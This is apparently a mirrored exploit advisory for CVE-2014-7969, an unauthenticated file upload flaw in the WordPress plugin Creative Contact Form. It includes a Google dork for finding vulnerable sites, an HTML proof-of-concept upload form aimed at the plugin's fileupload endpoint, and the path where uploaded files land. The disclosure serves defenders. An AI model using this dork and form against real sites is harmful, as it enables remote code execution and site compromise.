Creative Contact Form - Arbitrary File Upload

2014-11-1300:00:00

Root

www.seebug.org

EPSS

0.036

Percentile

91.7%

JSON

No description provided by source.


                                                ==========================================================
&quot;Creative Contact Form - The Best WordPress Contact Form Builder&quot; -
Arbitrary File Upload
 
# Author: Gianni Angelozzi
# Date: 08/10/2014
# Remote: Yes
# Vendor Homepage: https://profiles.wordpress.org/creative-solutions-1/
# Software Link: https://wordpress.org/plugins/sexy-contact-form/
# CVE: CVE-2014-7969
# Version: all including latest 0.9.7
# Google Dork: inurl:&quot;wp-content/plugins/sexy-contact-form&quot;
 
This plugin includes a PHP script to accept file uploads that doesn't
perform any security check, thus allowing unauthenticated remote file
upload, leading to remote code execution. All versions are affected.
Uploaded files are stored with their original file name.
==========================================================
PoC
==========================================================
Trigger a file upload
 
&lt;form method=&quot;POST&quot; action=&quot;
http://TARGET/wp-content/plugins/sexy-contact-form/includes/fileupload/index.php&quot;
enctype=&quot;multipart/form-data&quot;&gt;
&lt;input type=&quot;file&quot; name=&quot;files[]&quot; /&gt;&lt;button&gt;Upload&lt;/button&gt;
&lt;/form&gt;
Then the file is accessible under
 
http://TARGET/wp-content/plugins/sexy-contact-form/includes/fileupload/files/FILENAME
==========================================================
EOF
 
 
Thanks,
 
Gianni Angelozzi

EPSS

0.036

Percentile

91.7%

JSON

Related for SSV:87372